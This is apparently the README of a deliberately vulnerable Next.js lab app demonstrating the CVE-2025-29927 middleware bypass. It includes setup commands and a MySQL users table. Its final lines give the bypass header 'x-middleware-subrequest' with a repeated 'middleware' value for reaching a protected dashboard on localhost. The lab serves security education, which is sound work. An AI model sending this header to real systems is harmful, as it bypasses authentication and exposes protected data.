
जानबूझकर कमजोर बनाई गई Next.js एप्लिकेशन जो CVE-2025-29927 मिडलवेयर बाईपास एक्सप्लॉइट को प्रदर्शित करती है, सुरक्षा परीक्षण और शैक्षणिक अभ्यास के लिए।
npm install -D @types/bcrypt
npm install mysql2
npm install jose
npm install -D @types/jsonwebtoken
CREATE TABLE users (
id INT PRIMARY KEY AUTO_INCREMENT,
username VARCHAR(255) UNIQUE NOT NULL,
password VARCHAR(255) NOT NULL
);
npm run dev
# Register some users for test.
curl http://localhost:3000/api/register
# Curl dashboard with or without the header:
# "x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"
curl http://localhost:3000/dashboard